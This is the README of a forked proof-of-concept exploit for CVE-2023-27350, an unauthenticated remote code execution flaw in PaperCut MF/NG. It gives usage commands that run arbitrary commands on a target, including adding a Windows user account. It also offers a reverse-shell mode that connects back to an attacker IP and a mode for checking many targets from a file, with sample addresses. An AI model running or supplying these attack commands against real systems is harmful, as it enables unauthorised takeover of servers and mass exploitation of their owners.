This is a Proof of Concept (POC) exploit for CVE-2023-27350, a vulnerability found in PaperCut MF/NG that allows an unauthenticated attacker to execute arbitrary code with SYSTEM privileges.
Before using this exploit, make sure you have installed the following libraries:
pip install -r requirements.txt
python CVE-2023-27350.py -u <target url> [-c <command> | --reverse-shell | -f <file>]
-u
,--url
: The URL of the target PaperCut MF/NG application (e.g.,http://target-ip:9191
).-c
,--command
: The command to execute on the target system.--reverse-shell
: Use a reverse shell payload to execute commands on the target system.-f
,--file
: Check multiple targets from a file (e.g.,file.txt
).
To execute a command on the target system, use the -c
option:
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"
To use a reverse shell payload to execute commands on the target system, use the --reverse-shell
option. You will be prompted to enter your IP address and port number:
python exploit.py -u http://target-ip:9191 --reverse-shell Enter your IP address: <attacker-ip> Enter your port number: <port>
To check multiple targets from a file, use the -f
option. The format of the file should be ip_address:port
:
python CVE-2023-27350.py -f file.txt
When using the mass checking option with the file.txt
input, make sure that the contents of the file are formatted correctly.
Each line of the file should contain the IP address and port number of a target, separated by a colon :
. For example:
110.175.19.78:9191 110.175.19.78:80 192.168.1.1:8080
Make sure there are no extra spaces or characters in between the IP address, colon, and port number. Also, make sure that each line only contains one IP address and port number.
This is a forked version of the horizon3ai/CVE-2023-27350 repository. All credits for the original exploit go to the authors.